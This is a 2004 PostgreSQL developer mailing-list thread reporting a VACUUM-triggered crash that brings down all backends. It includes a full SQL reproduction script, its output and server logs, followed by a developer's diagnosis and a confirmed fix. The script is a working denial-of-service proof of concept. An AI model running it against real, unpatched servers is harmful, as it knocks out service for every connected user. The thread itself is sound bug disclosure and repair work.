Обсуждение: Denial of service via VACUUM, all backends exit and restart...

Поиск
Список
Период
Сортировка

Denial of service via VACUUM, all backends exit and restart...

От
Sean Chittenden
Дата:
There exists a crash that could easily be used as a denial of service
against PostgreSQL by any user who can call a trusted stored procedure
that makes use of temp tables.  This DoS does not exist without the use
of a stored procedure (from what I can tell).  The gist of it being:

CREATE DATABASE mydb WITH OWNER somedba;
\c mydb somedba
BEGIN;
-- Call a stored procedure that runs as SECURITY DEFINER, which creates
a temp table
-- Add one or more rows of data to the table
COMMIT;
VACUUM FULL ANALYZE;

Where somedba is the owner of the mydb database, but does not have any
abnormal privs (is just a user who happens to be a database owner).
When somedba runs VACUUM FULL ANALYZE, I get the following error during
the VACUUM which panics the entire cluster and causes all backends to
shutdown:

dba@mydb: [local] 22325 2004-10-03 10:51:15 PDT     ERROR:  relcache
reference tmptbl is not owned by resource owner
@:  21502 2004-10-03 10:51:20 PDT     LOG:  server process (PID 22325)
was terminated by signal 10
@:  21502 2004-10-03 10:51:20 PDT     LOG:  terminating any other
active server processes
@:  21502 2004-10-03 10:51:20 PDT     LOG:  all server processes
terminated; reinitializing
@:  22328 2004-10-03 10:51:21 PDT     LOG:  database system was
interrupted at 2004-10-03 10:50:03 PDT
@:  22328 2004-10-03 10:51:21 PDT     LOG:  checkpoint record is at
0/4C42FC8
@:  22328 2004-10-03 10:51:21 PDT     LOG:  redo record is at
0/4C42FC8; undo record is at 0/0; shutdown FALSE
@:  22328 2004-10-03 10:51:21 PDT     LOG:  next transaction ID: 14034;
next OID: 32678
@:  22328 2004-10-03 10:51:21 PDT     LOG:  database system was not
properly shut down; automatic recovery in progress
@:  22328 2004-10-03 10:51:21 PDT     LOG:  redo starts at 0/4C43008
@:  22328 2004-10-03 10:51:21 PDT     WARNING:  could not remove
database directory "/usr/local/pgsql/data/base/30827"
@:  22328 2004-10-03 10:51:24 PDT     LOG:  record with zero length at
0/57AA09C
@:  22328 2004-10-03 10:51:24 PDT     LOG:  redo done at 0/57AA070
@:  22328 2004-10-03 10:51:24 PDT     LOG:  database system is ready

I think this could be related to the bug I sent in a few days ago
regarding new databases not having the owner properly set when creating
a new database (ie, public is still owned by the owner of the template
database, same with information_schema, etc).

Regardless, here's an SQL script that reproduces this fatal condition:

\c template1 realdba
DROP DATABASE testdb;
CREATE USER testdba ENCRYPTED PASSWORD 'pass' NOCREATEDB NOCREATEUSER;
CREATE DATABASE testdb WITH OWNER testdba;

\c testdb realdba
ALTER SCHEMA public OWNER TO testdba;

\c testdb testdba
CREATE FUNCTION plpgsql_call_handler()
         RETURNS language_handler
         AS '$libdir/plpgsql', 'plpgsql_call_handler'
LANGUAGE c;
CREATE TRUSTED LANGUAGE plpgsql HANDLER plpgsql_call_handler;
REVOKE ALL PRIVILEGES ON DATABASE testdb FROM PUBLIC CASCADE;
GRANT CREATE,TEMPORARY ON DATABASE testdb TO testdba;
REVOKE ALL PRIVILEGES ON SCHEMA public FROM PUBLIC CASCADE;
GRANT USAGE ON SCHEMA public TO PUBLIC;
BEGIN;
CREATE FUNCTION public.tmptbl_foo() RETURNS VOID AS 'BEGIN
         PERFORM TRUE FROM pg_catalog.pg_class c LEFT JOIN
pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relname =
\'tmptbl\'::TEXT AND c.relkind = \'r\'::TEXT AND
pg_catalog.pg_table_is_visible(c.oid);
         IF NOT FOUND THEN
                 EXECUTE \'CREATE LOCAL TEMP TABLE tmptbl (key TEXT)
WITHOUT OIDS ON COMMIT DELETE ROWS;\';
         ELSE
                 TRUNCATE TABLE tmptbl;
         END IF;
         RETURN;
END;' LANGUAGE 'plpgsql' SECURITY DEFINER;
GRANT EXECUTE ON FUNCTION public.tmptbl_foo() TO PUBLIC;
SELECT public.tmptbl_foo();
-- There has to be data in the TEMP TABLE otherwise the backend does
not crash
INSERT INTO tmptbl VALUES ('goozfraba');
COMMIT;
VACUUM FULL ANALYZE;


The output:
You are now connected to database "template1" as user "realdba".
DROP DATABASE
CREATE USER
CREATE DATABASE
You are now connected to database "testdb" as user "realdba".
ALTER SCHEMA
You are now connected to database "testdb" as user "testdba".
CREATE FUNCTION
CREATE LANGUAGE
REVOKE
GRANT
REVOKE
GRANT
BEGIN
CREATE FUNCTION
GRANT
  tmptbl_foo
------------

(1 row)

COMMIT
psql:test.sql:36: server closed the connection unexpectedly
         This probably means the server terminated abnormally
         before or while processing the request.
psql:test.sql:36: connection to server was lost
Exit 2


And what a user sees on a different window:
% psql somedb
somedb=> BEGIN ;
somedb=> INSERT INTO t1 (id) VALUES (1);
somedb=> SELECT * from t1;
  id | i
----+---
   1 |
(1 row)

-- Run the SQL script from above
somedb=> SELECT * from t1;
WARNING:  terminating connection because of crash of another server
process
DETAIL:  The postmaster has commanded this server process to roll back
the current transaction and exit, because another server process exited
abnormally and possibly corrupted shared memory.
HINT:  In a moment you should be able to reconnect to the database and
repeat your command.
server closed the connection unexpectedly
         This probably means the server terminated abnormally
         before or while processing the request.
The connection to the server was lost. Attempting reset: Succeeded.
somedb=> SELECT * from t1;
  id | i
----+---
(0 rows)



Happy happy joy joy.  :-(  I ran this test a dozen times, and
periodically I'd get the following error message:

psql:test.sql:36: ERROR:  relcache reference pg_toast_81859 is not
owned by resource owner

instead of the crash, which leads me to believe that this could be
related to bgwriter as it seems to be execution time dependent and
bgwriter is the only component that I know of that could alter the
ordering of events via its calls to msleep().  I'm also of the belief
that pg_autovacuum seems to help mitigate this if I'm running this
script right as pg_autovacuum.  If I split the above VACUUM commands
into two different VACUUM's:

VACUUM;
VACUUM FULL;

I get varying results:

COMMIT
psql:test.sql:36: ERROR:  relcache reference tmptbl is not owned by
resource owner TopTransaction
ANALYZE
psql:test.sql:37: ERROR:  relcache reference pg_toast_122795 is not
owned by resource owner TopTransaction

or sometimes:

psql:test.sql:36: ERROR:  "pg_toast_122805" is not an index
psql:test.sql:37: ERROR:  "pg_toast_122805" is not an index

or:

psql:test.sql:36: ERROR:  could not open relation with OID 245679
psql:test.sql:37: ERROR:  could not open relation with OID 245679

or:

psql:test.sql:36: ERROR:  relcache reference pg_toast_204715 is not
owned by resource owner TopTransaction
psql:test.sql:37: ERROR:  relcache reference tmptbl is not owned by
resource owner

and sometimes:

psql:test.sql:36: ERROR:  relcache reference pg_class is not owned by
resource owner TopTransaction
server closed the connection unexpectedly
         This probably means the server terminated abnormally
         before or while processing the request.
psql:test.sql:37: connection to server was lost

If I change things around so it's ANALYZE; VACUUM;, I can prod out a
different error message:

ANALYZE
psql:test.sql:36: WARNING:  you don't own a lock of type
RowExclusiveLock
VACUUM
psql:test.sql:37: ERROR:  relcache reference tmptbl is not owned by
resource owner TopTransaction

and sometimes I just get:

psql:test.sql:36: WARNING:  you don't own a lock of type AccessShareLock
VACUUM
VACUUM

Both of them I can't get when doing VACUUMs alone.  :-(  That last
error message is spooky because I don't know if the backend is in a
stable state or not.... given the other error messages, I'm spooked.

:-/  So, with the wide range of error messages that come from the same
script, I'm wondering if some memory isn't being trampled on, or the
new subtransaction code and VACUUM/ANALYZE don't get along, or it's
bgwriter somehow.  *big shrug*

Regardless, I thought this would be of keen interest to many: hopefully
a fix can be found before 8.0 is released.  -sc

PS  I haven't tested to see if this bug exists in pre-8.X releases.

PPS Sorry for the barrage of bugs, I've been working offline for a few
days now... now driving and found a hot spot along 101.

/me gives 3 cheers for unprotected access points!!!

--
Sean Chittenden

Re: Denial of service via VACUUM, all backends exit and restart...

От
Tom Lane
Дата:
Sean Chittenden <chitt@speakeasy.net> writes:
> There exists a crash that could easily be used as a denial of service
> against PostgreSQL by any user who can call a trusted stored procedure
> that makes use of temp tables.

What this is actually exposing is a case where CurrentResourceOwner is
left pointing at garbage.  PortalRun saves and restores the caller's
value of CurrentResourceOwner, which is normally fine and dandy.
When doing a top-level command such as the VACUUM, CurrentResourceOwner
is TopTransactionResourceOwner.  However, VACUUM does internal
CommitTransaction and StartTransaction commands, which destroy and
recreate the whole transaction including TopTransactionResourceOwner.
In many situations TopTransactionResourceOwner ends up getting recreated
at the same address it was at before, but this is obviously not
guaranteeable in the general case; Sean's test case simply exposes one
path in which it isn't at the same address.

What I'm thinking of doing to fix it is having PortalRun note whether
the saved value of CurrentResourceOwner is the same as (the original
value of) TopTransactionResourceOwner, and at exit restore to the
current value of TopTransactionResourceOwner if so.  This is pretty
grotty but should cure the problem.  Anyone see another low-impact fix?

In the long run perhaps we should get rid of the idea of internal
transaction start/commits in VACUUM et al, or at least reduce them to be
just "partial commits" that don't go through the full CommitTransaction
process and in particular don't destroy major amounts of backend
internal state.  The whole thing is just too reminiscent of Wiley Coyote
sawing off the tree limb that he's standing on.

            regards, tom lane

Re: Denial of service via VACUUM, all backends exit and restart...

От
Sean Chittenden
Дата:
>> There exists a crash that could easily be used as a denial of service
>> against PostgreSQL by any user who can call a trusted stored procedure
>> that makes use of temp tables.
>
> What this is actually exposing is a case where CurrentResourceOwner is
> left pointing at garbage.  PortalRun saves and restores the caller's
> value of CurrentResourceOwner, which is normally fine and dandy.
> When doing a top-level command such as the VACUUM, CurrentResourceOwner
> is TopTransactionResourceOwner.  However, VACUUM does internal
> CommitTransaction and StartTransaction commands, which destroy and
> recreate the whole transaction including TopTransactionResourceOwner.
> In many situations TopTransactionResourceOwner ends up getting
> recreated
> at the same address it was at before, but this is obviously not
> guaranteeable in the general case; Sean's test case simply exposes one
> path in which it isn't at the same address.

FYI, I can confirm that your commit fixes this issue.  Thank you very
much!  -sc

--
Sean Chittenden